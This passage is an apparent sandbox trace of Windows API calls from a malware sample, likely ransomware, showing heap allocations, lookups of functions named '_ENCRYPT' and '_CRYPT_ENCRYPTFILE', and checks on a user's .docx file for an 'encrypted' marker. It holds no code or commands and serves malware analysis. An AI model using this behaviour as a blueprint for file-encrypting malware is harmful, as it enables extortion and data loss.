lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.046] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.046] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.046] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.046] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.046] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.046] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0037.047] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.047] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.047] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be5b000, ftCreationTime.dwHighDateTime=0x1d55664, ftLastAccessTime.dwLowDateTime=0x68a94680, ftLastAccessTime.dwHighDateTime=0x1d5b5e5, ftLastWriteTime.dwLowDateTime=0x68a94680, ftLastWriteTime.dwHighDateTime=0x1d5b5e5, nFileSizeHigh=0x0, nFileSizeLow=0x11955, dwReserved0=0x0, dwReserved1=0x777648, cFileName="_H6YZ.docx", cAlternateFileName="_H6YZ~1.DOC")) returned 0x7c20c0 [0037.047] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.048] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.048] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be5b000, ftCreationTime.dwHighDateTime=0x1d55664, ftLastAccessTime.dwLowDateTime=0x68a94680, ftLastAccessTime.dwHighDateTime=0x1d5b5e5, ftLastWriteTime.dwLowDateTime=0x68a94680, ftLastWriteTime.dwHighDateTime=0x1d5b5e5, nFileSizeHigh=0x0, nFileSizeLow=0x11955, dwReserved0=0x0, dwReserved1=0x777648, cFileName="_H6YZ.docx", cAlternateFileName="_H6YZ~1.DOC")) returned 0x7c20c0 [0037.048] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.049] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.050] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.051] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6YZ.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0037.051] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.051] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af348 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.052] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7a8 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.053] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.053] 